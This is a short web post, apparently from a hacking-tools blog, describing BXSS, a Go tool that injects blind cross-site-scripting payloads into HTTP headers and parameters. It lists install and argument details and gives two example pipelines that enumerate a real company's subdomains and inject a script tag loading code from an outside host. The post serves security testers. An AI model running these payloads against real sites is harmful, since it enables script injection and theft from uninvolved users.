BXSS : A Blind XSS Injector Tool

BXSS is a blind XSS injector tool.

Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments

— Coded by @z0idsec —
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default “User-Agent”)
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload

  • Blind XSS In Parameters

$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters

  • Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload ‘”><script src=https://z0id.xss.ht></script>’ -header “X-Forwarded-For”

R K

Recent Posts

Install Mono on Ubuntu 18.04: C# Compiler and Runtime Guide

Running programs built for Microsoft's framework on a Linux system is easier than you think. Mono is…

12 hours ago

Install OpenCV on Ubuntu 18.04: Step-by-Step Setup Guide

Computer vision technology powers many modern applications, from image editors to facial scanners. OpenCV (Open Source Computer…

13 hours ago

Install VNC on Ubuntu 18.04: Step-by-Step TigerVNC Setup

A remote desktop interface makes it easy to manage a remote computer. VNC (Virtual Network Computing) is…

13 hours ago

Install Gitea on Ubuntu 18.04: Self-Hosted Git Service Guide

Hosting your own code repositories is a great way to keep your projects private. Gitea is a…

13 hours ago

Install Java on Ubuntu 18.04: OpenJDK 11 and OpenJDK 8

Many modern programs require Java to run. From development tools like Eclipse to search systems…

13 hours ago

Configure a Static IP Address on Ubuntu 18.04: Netplan Guide

Setting a static IP address on your server is a smart move. It ensures your…

2 days ago